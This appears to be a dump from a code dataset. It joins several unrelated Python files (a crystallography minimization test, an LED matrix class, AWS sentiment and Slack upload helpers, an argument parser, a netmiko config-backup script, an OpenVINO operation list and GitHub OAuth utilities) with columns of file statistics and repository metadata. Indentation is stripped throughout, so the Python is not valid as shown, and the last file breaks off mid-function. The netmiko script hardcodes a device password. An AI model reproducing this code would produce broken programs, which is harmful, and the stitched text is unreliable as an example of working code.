def compute_map(xray_structure, d_min=1.5, resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 50)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.8)
start_error = flex.mean(xrs.distances(other = xrs_sh))
assert start_error>0.7
map_current, miller_array, crystal_gridding = compute_map(
xray_structure = xrs_sh)
for step in [miller_array.d_min()/4]*5:
minimized = minimization.run(
xray_structure = xrs_sh,
miller_array = miller_array,
crystal_gridding = crystal_gridding,
map_target = map_target,
max_iterations = 500,
min_iterations = 25,
step = step,
geometry_restraints_manager = None,
target_type = "diffmap")
xrs_sh = minimized.xray_structure
map_current = minimized.map_current
final_error = flex.mean(xrs.distances(other = minimized.xray_structure))
assert approx_equal(start_error, 0.8, 1.e-3)
assert final_error < 1.e-4
def exercise_03():
"""
Exercise maptbx.target_and_gradients_simple.
"""
def compute_map(xray_structure, d_min=1.5, resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 50)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.8)
#
t1 = maptbx.real_space_target_simple(
unit_cell = xrs.unit_cell(),
density_map = map_target,
sites_cart = xrs_sh.sites_cart(),
selection = flex.bool(xrs_sh.scatterers().size(), True))
g1 = maptbx.real_space_gradients_simple(
unit_cell = xrs.unit_cell(),
density_map = map_target,
sites_cart = xrs_sh.sites_cart(),
delta = 0.25,
selection = flex.bool(xrs_sh.scatterers().size(), True))
o = maptbx.target_and_gradients_simple(
unit_cell = xrs.unit_cell(),
map_target = map_target,
sites_cart = xrs_sh.sites_cart(),
delta = 0.25,
selection = flex.bool(xrs_sh.scatterers().size(), True))
assert approx_equal(t1, o.target())
for gi,gj in zip(g1, o.gradients()):
assert approx_equal(gi, gj)
def exercise_04():
"""
Exercise maptbx.target_and_gradients_simple in action: minimization
(bigger model).
"""
def compute_map(xray_structure, d_min=1., resolution_factor=1./4):
fc = xray_structure.structure_factors(d_min = d_min).f_calc()
fft_map = fc.fft_map(resolution_factor=resolution_factor)
fft_map.apply_sigma_scaling()
result = fft_map.real_map_unpadded()
return result, fc, fft_map
xrs = random_structure.xray_structure(
space_group_info = sgtbx.space_group_info("P212121"),
elements = ["N","C","O","S","P"]*10,
volume_per_atom = 150)
map_target,tmp,tmp = compute_map(xray_structure = xrs)
xrs_sh = xrs.deep_copy_scatterers()
xrs_sh.shake_sites_in_place(mean_distance=0.3)
start_error = flex.mean(xrs.distances(other = xrs_sh))
assert start_error > 0.29
map_current, miller_array, crystal_gridding = compute_map(
xray_structure = xrs_sh)
xrs_sh_ = xrs_sh.deep_copy_scatterers()
minimized = minimization.run(
xray_structure = xrs_sh_,
miller_array = miller_array,
crystal_gridding = crystal_gridding,
map_target = map_target,
max_iterations = 500,
min_iterations = 25,
step = 0.5,
geometry_restraints_manager = None,
target_type = "simple")
xrs_sh_ = xrs_sh_.replace_sites_cart(minimized.sites_cart)
final_error = flex.mean(xrs.distances(other = xrs_sh_))
assert final_error < 0.015
if (__name__ == "__main__"):
exercise_00()
exercise_01()
exercise_02()
exercise_03()
exercise_04()
| 36.235577
| 80
| 0.667109
| 1,089
| 7,537
| 4.277319
| 0.146924
| 0.025762
| 0.036496
| 0.041219
| 0.681408
| 0.653499
| 0.608416
| 0.588235
| 0.563332
| 0.5
| 0
| 0.031118
| 0.21547
| 7,537
| 207
| 81
| 36.410628
| 0.756638
| 0.043784
| 0
| 0.502793
| 0
| 0
| 0.009516
| 0
| 0
| 0
| 0
| 0
| 0.089385
| 1
| 0.055866
| false
| 0
| 0.055866
| 0
| 0.139665
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe66e2796ab20353c3b7dbe7a834d55cb22ebb8a
| 1,212
|
py
|
Python
|
open_imagilib/matrix.py
|
viktor-ferenczi/open-imagilib
|
3e7328840d58fd49eda28490e9bddf91390b1981
|
[
"MIT"
] | 2
|
2022-01-17T17:22:01.000Z
|
2022-01-22T13:11:33.000Z
|
open_imagilib/matrix.py
|
viktor-ferenczi/open-imagilib
|
3e7328840d58fd49eda28490e9bddf91390b1981
|
[
"MIT"
] | null | null | null |
open_imagilib/matrix.py
|
viktor-ferenczi/open-imagilib
|
3e7328840d58fd49eda28490e9bddf91390b1981
|
[
"MIT"
] | null | null | null |
""" LED matrix
"""
__all__ = ['Matrix']
from .colors import Color, on, off
from .fonts import font_6x8
class Matrix(list):
def __init__(self, source=None) -> None:
if source is None:
row_iter = ([off for _ in range(8)] for _ in range(8))
elif isinstance(source, list):
row_iter = (list(row) for row in source)
else:
raise TypeError('Unknown source to build a Matrix from')
super().__init__(row_iter)
def background(self, color: Color) -> None:
for i in range(8):
for j in range(8):
self[i][j] = color
def character(self, char: str, char_color: Color = on, *, x_offset: int = 1) -> None:
if x_offset <= -8 or x_offset >= 8:
return
if len(char) > 1:
char = char[0]
if not char:
char = ' '
if char < ' ' or char > '\x7f':
char = '\x7f'
bitmap = font_6x8[ord(char) - 32]
for i, row in enumerate(bitmap):
for j, c in enumerate(row):
if c != ' ':
x = x_offset + j
if 0 <= x < 8:
self[i][x] = char_color
| 26.347826
| 89
| 0.487624
| 159
| 1,212
| 3.559748
| 0.36478
| 0.04947
| 0.056537
| 0.038869
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.02578
| 0.391914
| 1,212
| 45
| 90
| 26.933333
| 0.742198
| 0.008251
| 0
| 0
| 0
| 0
| 0.045226
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.09375
| false
| 0
| 0.0625
| 0
| 0.21875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe68679524344d1cb6b9cfd2e5daf3c7c5e16099
| 1,704
|
py
|
Python
|
comprehend.py
|
korniichuk/cvr-features
|
ed3569222781258d4de242db3c9b51f19573bacb
|
[
"Unlicense"
] | null | null | null |
comprehend.py
|
korniichuk/cvr-features
|
ed3569222781258d4de242db3c9b51f19573bacb
|
[
"Unlicense"
] | null | null | null |
comprehend.py
|
korniichuk/cvr-features
|
ed3569222781258d4de242db3c9b51f19573bacb
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
# Name: comprehend
# Version: 0.1a2
# Owner: Ruslan Korniichuk
# Maintainer(s):
import boto3
def get_sentiment(text, language_code='en'):
"""Get sentiment.
Inspects text and returns an inference of the prevailing sentiment
(positive, neutral, mixed, or negative).
Args:
text: UTF-8 text string. Each string must contain fewer that
5,000 bytes of UTF-8 encoded characters (required | type: str).
language_code: language of text (not required | type: str |
default: 'en').
Returns:
sentiment: sentiment: positive, neutral, mixed, or negative
(type: str).
"""
def prepare_text(text):
while len(bytes(text, 'utf-8')) > 4999:
text = text[:-1]
return text
comprehend = boto3.client('comprehend')
text = prepare_text(text)
try:
r = comprehend.detect_sentiment(Text=text, LanguageCode='en')
except Exception as e:
raise e
sentiment = r['Sentiment'].lower()
return sentiment
# Example. Get sentiment of text below:
# "I ordered a small and expected it to fit just right but it was a little bit
# more like a medium-large. It was great quality. It's a lighter brown than
# pictured but fairly close. Would be ten times better if it was lined with
# cotton or wool on the inside."
# text = "I ordered a small and expected it to fit just right but it was a \
# little bit more like a medium-large. It was great quality. It's a \
# lighter brown than pictured but fairly close. Would be ten times \
# better if it was lined with cotton or wool on the inside."
# get_sentiment(text)
| 32.150943
| 78
| 0.6473
| 242
| 1,704
| 4.528926
| 0.450413
| 0.027372
| 0.029197
| 0.05292
| 0.432482
| 0.432482
| 0.361314
| 0.361314
| 0.361314
| 0.361314
| 0
| 0.014354
| 0.264085
| 1,704
| 52
| 79
| 32.769231
| 0.859649
| 0.687793
| 0
| 0
| 0
| 0
| 0.059957
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.142857
| false
| 0
| 0.071429
| 0
| 0.357143
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe6923b1aa562920cf3b40c7be4c7dd797b7d3f4
| 1,039
|
py
|
Python
|
pbx_gs_python_utils/lambdas/utils/puml_to_slack.py
|
owasp-sbot/pbx-gs-python-utils
|
f448aa36c4448fc04d30c3a5b25640ea4d44a267
|
[
"Apache-2.0"
] | 3
|
2018-12-14T15:43:46.000Z
|
2019-04-25T07:44:58.000Z
|
pbx_gs_python_utils/lambdas/utils/puml_to_slack.py
|
owasp-sbot/pbx-gs-python-utils
|
f448aa36c4448fc04d30c3a5b25640ea4d44a267
|
[
"Apache-2.0"
] | 1
|
2019-05-11T14:19:37.000Z
|
2019-05-11T14:51:04.000Z
|
pbx_gs_python_utils/lambdas/utils/puml_to_slack.py
|
owasp-sbot/pbx-gs-python-utils
|
f448aa36c4448fc04d30c3a5b25640ea4d44a267
|
[
"Apache-2.0"
] | 4
|
2018-12-27T04:54:14.000Z
|
2019-05-11T14:07:47.000Z
|
import base64
import tempfile
import requests
from osbot_aws.apis import Secrets
from osbot_aws.apis.Lambdas import Lambdas
def upload_png_file(channel_id, file):
bot_token = Secrets('slack-gs-bot').value()
my_file = {
'file': ('/tmp/myfile.png', open(file, 'rb'), 'png')
}
payload = {
"filename" : 'image.png',
"token" : bot_token,
"channels" : [channel_id],
}
requests.post("https://slack.com/api/files.upload", params=payload, files=my_file)
return 'image sent .... '
def run(event, context):
channel = event['channel']
puml = event['puml']
puml = puml.replace('<', '<').replace('>', '>')
(fd, tmp_file) = tempfile.mkstemp('png)')
puml_to_png = Lambda('utils.puml_to_png').invoke
result = puml_to_png({"puml": puml })
with open(tmp_file, "wb") as fh:
fh.write(base64.decodebytes(result['png_base64'].encode()))
return upload_png_file(channel, tmp_file)
| 28.081081
| 86
| 0.589028
| 128
| 1,039
| 4.609375
| 0.460938
| 0.040678
| 0.045763
| 0.054237
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007722
| 0.252166
| 1,039
| 36
| 87
| 28.861111
| 0.751609
| 0
| 0
| 0
| 0
| 0
| 0.167469
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074074
| false
| 0
| 0.185185
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe694e90c7ac984d467776f89ad0bcfbd5ee4819
| 2,131
|
py
|
Python
|
src/system_io/input.py
|
DeseineClement/bigdata-housing-classifier
|
aa864056c8b25217821f59d16c1ba5725c21a185
|
[
"MIT"
] | null | null | null |
src/system_io/input.py
|
DeseineClement/bigdata-housing-classifier
|
aa864056c8b25217821f59d16c1ba5725c21a185
|
[
"MIT"
] | null | null | null |
src/system_io/input.py
|
DeseineClement/bigdata-housing-classifier
|
aa864056c8b25217821f59d16c1ba5725c21a185
|
[
"MIT"
] | null | null | null |
from sys import argv
from getopt import getopt
from os import R_OK, access
from string import Template
DEFAULT_DATASET_FILE_PATH = "dataset/data.csv"
DEFAULT_DATASET_COLUMNS = ['surface (m2)', 'height (m)', 'latitude', 'housing_type', 'longitude', 'country_code',
'city']
DEFAULT_VISU = ["scatter_plot", "histogram"]
DEFAULT_RANGE = [0, 1000]
def arguments():
options, *_ = getopt(argv[1:], 'dc', ['dataset-file=', 'columns=', 'visus=', 'range='])
dataset_file = DEFAULT_DATASET_FILE_PATH
dataset_columns = DEFAULT_DATASET_COLUMNS
dataset_visus = DEFAULT_VISU
dataset_range = DEFAULT_RANGE
for opt, arg in options:
if opt in ('-d', '--dataset-file'):
dataset_file = arg
elif opt in ('-c', '--columns'):
dataset_columns = arg.split(',')
elif opt in ('-v', '--visus'):
dataset_visus = arg.split(',')
elif opt in ('-r', '--range'):
dataset_range = arg.split(',')
dataset_range = list(map(lambda x: int(x), dataset_range))
if len(dataset_range) == 1 :
dataset_range.append(DEFAULT_RANGE[1])
if not access(dataset_file, R_OK):
raise RuntimeError(Template("the file $file does not exists or is not readable.").substitute(file=dataset_file))
for column in dataset_columns:
if column not in DEFAULT_DATASET_COLUMNS:
raise RuntimeError(Template("Invalid column $column must be one of $columns.").
substitute(column=column, columns=','.join(DEFAULT_DATASET_COLUMNS)))
for visu in dataset_visus:
if visu not in DEFAULT_VISU:
raise RuntimeError(Template("Invalid visu $column must be one of $columns.").
substitute(column=visu, columns=','.join(DEFAULT_VISU)))
for range_num in dataset_range:
if range_num not in range(0, 1001):
raise RuntimeError(Template("Invalid range $column must be between 0 and 999.").
substitute(column=range_num))
return dataset_file, dataset_columns, dataset_visus, dataset_range
| 41.784314
| 120
| 0.633975
| 264
| 2,131
| 4.924242
| 0.310606
| 0.076154
| 0.064615
| 0.073846
| 0.132308
| 0.061538
| 0.061538
| 0.061538
| 0
| 0
| 0
| 0.011229
| 0.247771
| 2,131
| 50
| 121
| 42.62
| 0.79975
| 0
| 0
| 0
| 0
| 0
| 0.177851
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.02381
| false
| 0
| 0.095238
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe6bf9a13a6fe5e608e3131b9e7d5730fd32e4d4
| 1,490
|
py
|
Python
|
netmiko/example7.py
|
Tes3awy/Ntemiko-Examples
|
b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba
|
[
"MIT"
] | 3
|
2021-05-20T05:34:49.000Z
|
2022-02-14T03:35:10.000Z
|
netmiko/example7.py
|
Tes3awy/Ntemiko-Examples
|
b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba
|
[
"MIT"
] | null | null | null |
netmiko/example7.py
|
Tes3awy/Ntemiko-Examples
|
b29aa3b0de14916f1ebac5b0f1ed7fe37d8740ba
|
[
"MIT"
] | 2
|
2021-08-19T12:34:47.000Z
|
2022-03-28T15:48:55.000Z
|
# Must run example4.py first
# Read an Excel sheet and save running config of devices using pandas
import pandas as pd
from netmiko import ConnectHandler
# Read Excel file of .xlsx format
data = pd.read_excel(io="Example4-Device-Details.xlsx", sheet_name=0)
# Convert data to data frame
df = pd.DataFrame(data=data)
# Conevrt data frame from MGMT IP Address to a list
device_ip_list = df.iloc[:, 1].tolist()
# Define devices variable
devices = []
for ip in device_ip_list:
devices.append(
{
"device_type": "cisco_ios", # must be the same for all devices
"ip": ip,
"username": "developer", # must be the same for all devices
"password": "C1sco12345", # must be the same for all devices
"port": 22, # must be the same for all devices
# If port for all devices is not 22 you will get an error
"fast_cli": False,
}
)
for device in devices:
# Create a connection instance
with ConnectHandler(**device) as net_connect:
# hostname of the current device
hostname = net_connect.send_command(
command_string="show version", use_textfsm=True
)[0]["hostname"]
run_cfg: str = net_connect.send_command(command_string="show running-config")
# Create .txt for each running configuration of each device
with open(file=f"{hostname}_ex7-run-cfg.txt", mode="w") as outfile:
outfile.write(run_cfg.lstrip())
print("Done")
| 31.702128
| 85
| 0.658389
| 212
| 1,490
| 4.533019
| 0.495283
| 0.031217
| 0.067638
| 0.05411
| 0.187305
| 0.187305
| 0.187305
| 0
| 0
| 0
| 0
| 0.014311
| 0.249664
| 1,490
| 46
| 86
| 32.391304
| 0.845259
| 0.357718
| 0
| 0
| 0
| 0
| 0.177282
| 0.057325
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.038462
| 0.076923
| 0
| 0.076923
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe6cc530fb4e5b20aac699a77d75b91318a5ca68
| 2,385
|
py
|
Python
|
inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py
|
plaidml/openvino
|
e784ab8ab7821cc1503d9c5ca6034eea112bf52b
|
[
"Apache-2.0"
] | null | null | null |
inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py
|
plaidml/openvino
|
e784ab8ab7821cc1503d9c5ca6034eea112bf52b
|
[
"Apache-2.0"
] | 105
|
2020-06-04T00:23:29.000Z
|
2022-02-21T13:04:33.000Z
|
inference-engine/tests/ie_test_utils/functional_test_utils/layer_tests_summary/utils/constants.py
|
mpapaj/openvino
|
37b46de1643a2ba6c3b6a076f81d0a47115ede7e
|
[
"Apache-2.0"
] | 1
|
2020-10-23T06:45:11.000Z
|
2020-10-23T06:45:11.000Z
|
# Copyright (C) 2021 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
VERIFIED_OP_REFERENCES = [
'Abs-1',
'Acos-1',
'Add-1',
'Asin-1',
'Asinh-3',
'Assign-6',
'AvgPool-1',
'BatchNormInference-5',
'BatchToSpace-2',
'BinaryConvolution-1',
'Broadcast-1',
'Broadcast-3',
'Bucketize-3',
'Ceiling-1',
'CTCGreedyDecoder-1',
'CTCGreedyDecoderSeqLen-6',
'Concat-1',
'Convert-1',
'ConvertLike-1',
'Convolution-1',
'Constant-1',
'Cos-1',
'Cosh-1',
'DeformableConvolution-1',
'DeformablePSROIPooling-1',
'DepthToSpace-1',
'DetectionOutput-1',
'Divide-1',
'ExperimentalDetectronDetectionOutput-6',
'ExperimentalDetectronGenerateProposalsSingleImage-6',
'ExperimentalDetectronPriorGridGenerator-6',
'ExperimentalDetectronROIFeatureExtractor-6',
'ExperimentalDetectronTopKROIs-6',
'FakeQuantize-1',
'Floor-1'
'FloorMod-1'
'GRUSequence-5',
'Gather-1',
'GatherElements-6',
'GatherND-5',
'Gelu-7',
'GRN-1',
'GroupConvolution-1',
'GroupConvolutionBackpropData-1',
'GRUSequence-5',
'HSigmoid-5',
'HSwish-4',
'HardSigmoid-1',
'Interpolate-4',
'LRN-1',
'LSTMCell-4',
'LSTMSequence-5',
'LogSoftmax-5',
'Loop-5',
'MVN-6',
'Maximum-1',
'MaxPool-1',
'Mish-4',
'Multiply-1',
'Negative-1',
'NonMaxSuppression-4',
'NonMaxSuppression-5',
'NonZero-3',
'NormalizeL2-1',
'PriorBox-1',
'PriorBoxClustered-1',
'Proposal-1',
'Proposal-4',
'PSROIPooling-1',
'RNNSequence-5',
'ROIAlign-3',
'ROIPooling-2',
'Range-1',
'Range-4',
'ReadValue-6',
'ReduceL1-4',
'ReduceL2-4',
'ReduceLogicalAnd-1',
'ReduceLogicalOr-1',
'ReduceMax-1',
'ReduceMean-1',
'ReduceMin-1',
'ReduceProd-1',
'ReduceSum-1',
'RegionYOLO-1',
'Relu-1',
'ReorgYOLO-2',
'Result-1'
'Round-5',
'SpaceToDepth-1',
'ScatterNDUpdate-4',
'Select-1',
'ShapeOf-1',
'ShapeOf-3',
'ShuffleChannels-1',
'Sigmoid-1',
'Sign-1',
'Sin-1',
'Sinh-1'
'SoftPlus-4',
'Softmax-1',
'Split-1',
'Squeeze-1',
'StridedSlice-1',
'Subtract-1',
'Swish-4',
'Tile-1',
'TopK-1',
'TopK-3',
'Transpose-1',
'Unsqueeze-1',
'VariadicSplit-1',
]
| 20.211864
| 58
| 0.568134
| 238
| 2,385
| 5.684874
| 0.52521
| 0.014782
| 0.019217
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066814
| 0.240671
| 2,385
| 117
| 59
| 20.384615
| 0.680287
| 0.030189
| 0
| 0.017544
| 0
| 0
| 0.6
| 0.131602
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe6ce225addf6075e565169dfeb40c47ef8bca4d
| 18,542
|
py
|
Python
|
ghub/githubutils.py
|
mahanthathreyee/ghub
|
b212ca068ef530d034095e6ef5d964e4e78dc022
|
[
"MIT"
] | null | null | null |
ghub/githubutils.py
|
mahanthathreyee/ghub
|
b212ca068ef530d034095e6ef5d964e4e78dc022
|
[
"MIT"
] | null | null | null |
ghub/githubutils.py
|
mahanthathreyee/ghub
|
b212ca068ef530d034095e6ef5d964e4e78dc022
|
[
"MIT"
] | null | null | null |
"""Utilities for interacting with GitHub"""
import os
import json
import webbrowser
import stat
import sys
from git import Repo
from .context import Context
event_dict = {
"added_to_project": (
lambda event: "{} added the issue to a project.".format(event["actor"]["login"])
),
"assigned": (
lambda event: "{} assigned the issue to {}.".format(
event["actor"]["login"], event["assignee"]["login"]
)
),
"closed": (lambda event: "{} closed this issue.".format(event["actor"]["login"])),
"converted_note_to_issue": (
lambda event: "{} created this issue from a note.".format(
event["actor"]["login"]
)
),
"demilestoned": (lambda event: "The issue was removed from a milestone."),
"head_ref_deleted": (lambda event: "The pull request's branch was deleted."),
"head_ref_restored": (lambda event: "The pull request's branch was restored."),
"labelled": (
lambda event: "{} added {} label to the issue.".format(
event["actor"]["login"], event["label"]
)
),
"locked": (
lambda event: "The issue was locked by {}.".format(event["actor"]["login"])
),
"mentioned": (
lambda event: "{} was mentioned in the issue's body.".format(
event["actor"]["login"]
)
),
"marked_as_duplicate": (
lambda event: "The issue was marked duplicate by {}.".format(
event["actor"]["login"]
)
),
"merged": (
lambda event: "The issue was merged by {}.".format(event["actor"]["login"])
),
"milestoned": (lambda event: "The issue was added to a milestone."),
"moved_columns_in_project": (
lambda event: "The issue was moved between columns in a project board."
),
"referenced": (lambda event: "The issue was referenced from a commit message."),
"renamed": (lambda event: "The title of the issue was changed."),
"reopened": (
lambda event: "The issue was reopened by {}".format(event["actor"]["login"])
),
"review_dismissed": (
lambda event: "{} dismissed a review from the pull request.".format(
event["actor"]["login"]
)
),
"review_requested": (
lambda event: "{} requested review from the subject on this pull request.".format(
event["actor"]["login"]
)
),
"review_request_removed": (
lambda event: "{} removed the review request for the subject on this pull request.".format(
event["actor"]["login"]
)
),
"subscribed": (
lambda event: "{} subscribed to receive notifications for the issue.".format(
event["actor"]["login"]
)
),
"transferred": (lambda event: "The issue was transferred to another repository."),
"unassigned": (
lambda event: "{} was unassigned from the issue.".format(
event["actor"]["login"]
)
),
"unlabeled": (lambda event: "A label was removed from the issue."),
"unlocked": (
lambda event: "The issue was unlocked by {}".format(event["actor"]["login"])
),
"unmarked_as_duplicate": (lambda event: "The was unmarked as dublicate."),
"user_blocked": (lambda event: "A user was blocked from the organization."),
}
def authorize(ghub, reauthorize=False, fromenv=False):
"""Authorize a user for GHub
Keyword arguments:
ghub -- the ghub object that needs authorization
reauthorize -- performs authorization again (default False)
"""
if fromenv:
oauth_data = json.loads(os.environ["GHUB_CRED"])
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
if not os.path.isfile(ghub.data_path / ghub.auth_filename) or reauthorize:
authorization_base_url = "https://github.com/login/oauth/authorize"
token_url = "https://github.com/login/oauth/access_token"
authorization_url, _ = ghub.github.authorization_url(authorization_base_url)
webbrowser.open(authorization_url)
print("Please visit this site and grant access: {}".format(authorization_url))
redirect_response = input(
"Please enter the URL you were redirected to after granting access: "
)
try:
response = ghub.github.fetch_token(
token_url,
client_secret=ghub.client_secret,
authorization_response=redirect_response,
)
except Exception as e:
print(e)
print(
"Network Error. Make sure you have a working internet connection and try again."
)
sys.exit(1)
if not os.path.isdir(ghub.data_path):
os.makedirs(ghub.data_path)
data_file = open(ghub.data_path / ghub.auth_filename, "w+")
json.dump(response, data_file)
data_file.close()
os.chmod(ghub.data_path / ghub.auth_filename, stat.S_IRUSR | stat.S_IWUSR)
ghub.oauth_data = response
return True
else:
data_file = open(ghub.data_path / ghub.auth_filename, "r")
oauth_data = json.loads(data_file.read())
data_file.close()
ghub.oauth_data = oauth_data
ghub.github.token = oauth_data
return True
def get_user(ghub, user):
url = ghub.api_url + ghub.endpoints["users"] + user
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "user"
ghub.context.location = user
ghub.context.cache = response.json()
return True
return False
def get_org(ghub, org):
url = ghub.api_url + ghub.endpoints["orgs"] + org
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.context = "org"
ghub.context.location = org
ghub.context.cache = response.json()
return True
return False
def get_user_tabs(ghub, tab=""):
tabs = ["repos", "stars", "followers", "following", "notifications"]
if tab not in tabs:
print("{} is not a valid user tab".format(tab))
return
if ghub.context.context == "root":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
response = ghub.github.get(ghub.api_url + ghub.endpoints["user"] + "/repos")
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "repos"
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + "stars"
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url + ghub.endpoints["user"] + "/" + tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif tab == "notifications":
response = ghub.github.get(ghub.api_url + ghub.endpoints["notifications"])
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.user["login"] + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
elif ghub.context.context == "user" or ghub.context.context == "org":
if tab == "":
ghub.context.set_context_to_root()
elif tab == "repos":
if ghub.context.context == "user":
url = (
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/repos"
)
else:
url = (
ghub.api_url
+ ghub.endpoints["orgs"]
+ ghub.context.location
+ "/repos"
)
response = ghub.github.get(url)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "repos"
)
ghub.context.context = "repos"
else:
print("Error getting data - " + response.status_code)
elif tab == "stars":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/starred"
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = (
ghub.context.prev_context.location + "/" + "star"
)
ghub.context.context = "stars"
else:
print("Error getting data - " + response.status_code)
elif tab == "followers" or tab == "following":
response = ghub.github.get(
ghub.api_url
+ ghub.endpoints["users"]
+ ghub.context.location
+ "/"
+ tab
)
if response.status_code == 200:
ghub.context = Context(prev_context=ghub.context)
ghub.context.cache = response.json()
ghub.context.location = ghub.context.prev_context.location + "/" + tab
ghub.context.context = tab
else:
print("Error getting data - " + response.status_code)
else:
pass
def get_latest_commit(ghub, repo, branch="master"):
api_url = "https://api.github.com/repos/{}/branches/{}".format(repo, branch)
response = ghub.github.get(api_url)
if response.status_code == 200:
response = response.json()
return response["commit"]["commit"]
else:
return False
def get_tree(ghub, repo=None, branch="master", tree_url=None):
if tree_url == None:
latest_commit = get_latest_commit(ghub, repo, branch)
if latest_commit == False:
return False
response = ghub.github.get(latest_commit["tree"]["url"])
if response.status_code == 200:
response = response.json()
return response
return False
else:
response = ghub.github.get(tree_url)
if response.status_code == 200:
response = response.json()
return response
def get_blob(ghub, blob_url):
response = ghub.github.get(blob_url)
if response.status_code == 200:
return response.json()
return False
def clone_repo(ghub, dir, repo_name=None):
print("Preparing to clone...")
